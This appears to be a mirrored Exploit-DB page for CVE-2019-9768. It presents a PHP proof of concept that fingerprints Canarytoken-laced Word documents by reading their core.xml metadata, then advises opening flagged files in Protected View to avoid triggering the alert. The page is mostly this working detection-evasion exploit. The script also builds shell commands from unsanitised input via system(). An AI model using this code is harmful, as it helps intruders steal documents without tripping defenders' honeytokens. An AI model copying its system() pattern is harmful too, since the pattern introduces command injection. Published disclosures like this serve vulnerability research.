Canarytokens 2019-03-01 – Detection Bypass

• Exploit Database
• 120 阅读

• 作者： Benjamin Zink Loft, Gionathan Reale
  日期： 2019-03-21
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46589/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38

  ## Exploit Title: Canarytokens 2019-03-01 - Detection Bypass # Date: 20.03.2019 # Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale # Vendor Homepage: https://thinkst.com/ # Version: up to 2019-03-01 # Software Link: https://github.com/thinkst/canarytokens # Google Dork: N/A # CVE: 2019-9768 #================================================================================================================================================================================== # PoC: # # # # Requires unzip: # # sudo apt-get install unzip # #     <?php system(&apos;unzip &apos; . $argv[1] . &apos;.docx&apos;); system(&apos;cp &apos; . $argv[1] . &apos;.docx ./docProps/&apos; . $argv[1] . &apos;.docx && cd docProps&apos;); $strFile = file_get_contents("docProps/core.xml"); if(strpos($strFile, &apos;AAAAAAAAAAAAAAAA&apos;)!=false && strpos($strFile, &apos;2015-07-21&apos;)!=false && filesize( $argv[1] .".docx") < 170000 ) { echo "This file probably contains a CanaryToken! Open it with Libreoffice/Microsoft Word Protected View to bypass detection"; } else { echo "Should be safe to open normally"; } ?>